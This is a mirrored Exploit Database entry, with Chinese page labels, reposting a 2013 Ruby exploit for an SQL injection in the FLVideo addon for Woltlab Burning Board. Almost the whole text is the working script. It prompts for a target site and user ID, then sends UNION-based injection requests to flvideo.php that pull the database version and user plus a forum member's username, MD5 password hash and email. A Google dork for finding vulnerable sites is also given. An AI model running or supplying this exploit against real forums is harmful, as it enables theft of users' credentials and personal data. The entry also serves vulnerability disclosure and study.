Woltlab Burning Board FLVideo Addon – ‘video.php?value’ SQL Injection

• Exploit Database
• 10 阅读

• 作者： Easy Laster
  日期： 2013-09-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28126/

• # Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
  # Google Dork: inurl:flvideo.php wbb (and more)
  # Date: 04.09.2013
  # Exploit Author: Easy Laster
  # Vendor Homepage: http://www.flvideo.de/
  # Version: FLVideo Addon for WBB © 2007 by Danny König 
  # Tested on: Windows8/Backtrack
  
  #!/usr/bin/ruby
  #secunet.cc
  #19.02.2013
  #Discovered and Vulnerability by Easy Laster
  #flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*
  #*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))
  #null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/
  #**/+userid=1--+
  print "
  ################################################################
  #secunet.cc#
  ################################################################
  #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
  #Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
  #Exploit #
  # Using Host+Path+id #
  #www.demo.de + /wbb/ + or + / + 1#
  # Easy Laster#
  #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
  ################################################################
  "
  require 'net/http'
  block = "################################################################"
  print ""+ block +""
  print "\nEnter Target Name (site.com)->"
  host=gets.chomp
  print ""+ block +""
  print "\nEnter Script Path (/wbb/ or /)->"
  path=gets.chomp
  print ""+ block +""
  print "\nEnter The ID From User (id)->"
  userid=gets.chomp
  print ""+ block +""
  begin
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]
  
   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]
  
   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  
  dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+
  "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  "**/+userid="+ userid +"--+"
  http = Net::HTTP.new(host, 80)
  resp= http.get(path+dir)
  print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  
   dir ="flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
   "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+
   "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
   "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
   "**/+userid="+ userid +"--+"
   http = Net::HTTP.new(host, 80)
   resp= http.get(path+dir)
   print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  print "\n" 
  print ""+ block +""
   print "\n"
   print "
  ################################################################
  #Greetings #
  ################################################################
  #mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
  #DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
  #ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc#
  ################################################################
   "
   rescue
  print "\nExploit Failed"
  end